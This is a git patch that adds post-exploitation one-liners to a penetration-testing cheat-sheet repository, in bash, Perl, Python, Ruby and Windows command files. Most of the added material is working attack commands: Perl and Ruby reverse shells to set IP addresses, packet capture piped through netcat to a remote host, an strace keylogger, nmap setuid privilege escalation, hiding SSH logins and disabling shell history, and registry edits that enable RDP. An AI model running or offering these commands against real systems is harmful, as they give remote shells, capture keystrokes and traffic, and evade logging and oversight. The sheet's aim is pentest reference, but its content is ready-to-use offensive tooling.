From 5a3b92ae4ca5892fdad5f2c0d5b7576d5b0a8484 Mon Sep 17 00:00:00 2001 From: "tekwizz123@gmail.com" Date: Tue, 17 Dec 2013 20:22:00 +0000 Subject: [PATCH] Added one liners from @pentestcliX --- scripting/bash.md | 82 ++++++++++++++++++++++++++++++++++++++++++++ scripting/perl.md | 8 ++++- scripting/python.md | 6 +++- scripting/ruby.md | 8 ++++- scripting/windows.md | 16 +++++++++ 5 files changed, 117 insertions(+), 3 deletions(-) create mode 100644 scripting/bash.md create mode 100644 scripting/windows.md diff --git a/scripting/bash.md b/scripting/bash.md new file mode 100644 index 0000000..9560168 --- /dev/null +++ b/scripting/bash.md @@ -0,0 +1,82 @@ +# Bash Commands for Post Exploitation + +One liners +----------- + +**Resolve a list of hostnames to IP addresses** +```bash +awk < hostnames.txt '{ system("resolveip -s " $1) }'``` + +**IIS 6.0 IP Disclosure** +```bash +curl -l -O -H "Host:" "example.com"``` + +**Connect to SSL websites** +```bash +openssl s_client -connect example.com:443``` + +**Convert base64 to text** +```bash +echo 'base64string' | base64 -d (Use -D on OSX)``` + +**Decode ASCII shellcode** +```bash +echo -e *shellcode hex string* (may need to use -i to ignore bad chars)``` + +**Enumerate DNS of Class C** +```bash +for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done``` + +**SSH to box and hide from "who" and "lastlog"** +```bash +ssh andrew@10.1.1.1 -T /bin/bash``` + +**Prevent terminal logging** +```bash +unset HISTFILE``` + +**Add immutable attribute to a unix file** +```bash +chattr +i *file*``` + +**SSH into host2 through host1** +```bash +ssh -o "proxycommand ssh -W host2 host1" host2``` + +**Nmap setuid privesc** +```bash +nmap --script <(echo 'os.execute("/bin/sh")') +nmap --interactive (for older versions)``` + +**Transfer files through SSH** +```bash +ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gz``` + +**Internal port redirect for bypassing services** +```bash +iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444``` + +**Enable forwarding on the fly** +```bash +sysctl -w net.ipv4.ip_forward=1``` + +**Kill with USR1 developer defined signal** +```bash +kill -USR1 ``` + +**Pull IP addresses from a file** +```bash +grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'``` + +**Sniff traffic with tcpdump and send to remote tcp socket** +```bash +tcpdump -w - | nc -v 8.8.8.8 9999``` + +**Recursively search for files within a directory** +```bash +zcat -rf ./* | grep "searchstring" + +Credits +----------- +Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions + diff --git a/scripting/perl.md b/scripting/perl.md index 4328430..bc6bd83 100644 --- a/scripting/perl.md +++ b/scripting/perl.md @@ -2,4 +2,10 @@ **Perl reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)** -```perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'``` +```perl +perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'``` + +**Running proc keylogger** +```perl +strace -p $PID -f -eread -o '| perl -ne'\"BEGIN{$|=1}my($i)=/\(0,"([^"]*)"/;print$i'\'``` + diff --git a/scripting/python.md b/scripting/python.md index bc21def..f801d7e 100644 --- a/scripting/python.md +++ b/scripting/python.md @@ -17,4 +17,8 @@ python -c "import socket,subprocess,os;host=\"[YOURIP]\";port=9000;s=socket.sock **Spawn bash shell prompt** ```python -python -c 'import pty; pty.spawn("/bin/bash")'``` \ No newline at end of file +python -c 'import pty; pty.spawn("/bin/bash")'``` + +***Print all ASCII characters*** +```python +python -c 'import string; print string.printable'``` diff --git a/scripting/ruby.md b/scripting/ruby.md index 5e8a5b8..142d88f 100644 --- a/scripting/ruby.md +++ b/scripting/ruby.md @@ -9,4 +9,10 @@ ruby -run -e httpd -- -p 8001 .``` **Reverse /bin/sh shell on port 443 from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)** ```ruby -ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'``` \ No newline at end of file +ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'``` + +***URL Encode*** +```ruby +ruby -e 'require "open-uri"; result = URI.escape(YOUR STRING HERE, Regexp.new("[^#{URI::PATTERN::UNRESERVED}]"))'``` + + diff --git a/scripting/windows.md b/scripting/windows.md new file mode 100644 index 0000000..571e2c3 --- /dev/null +++ b/scripting/windows.md @@ -0,0 +1,16 @@ +# Windows Commands for Post Exploitation + +One liners +----------- +**Tunnel traffic natively with windows** +```bash +netsh int portproxy v4tov4 listenport=80 connecthost=10.0.0.1 connectport=80 + +**Launch cmd.exe as local system w/ psexec** +psexec -s cmd.exe + +**Enable rdp with CLI** +reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + +**Launch ARP scan** +for /L %i in (1,1,255) do @start /b ping -n 1 -w 1 192.168.1.%i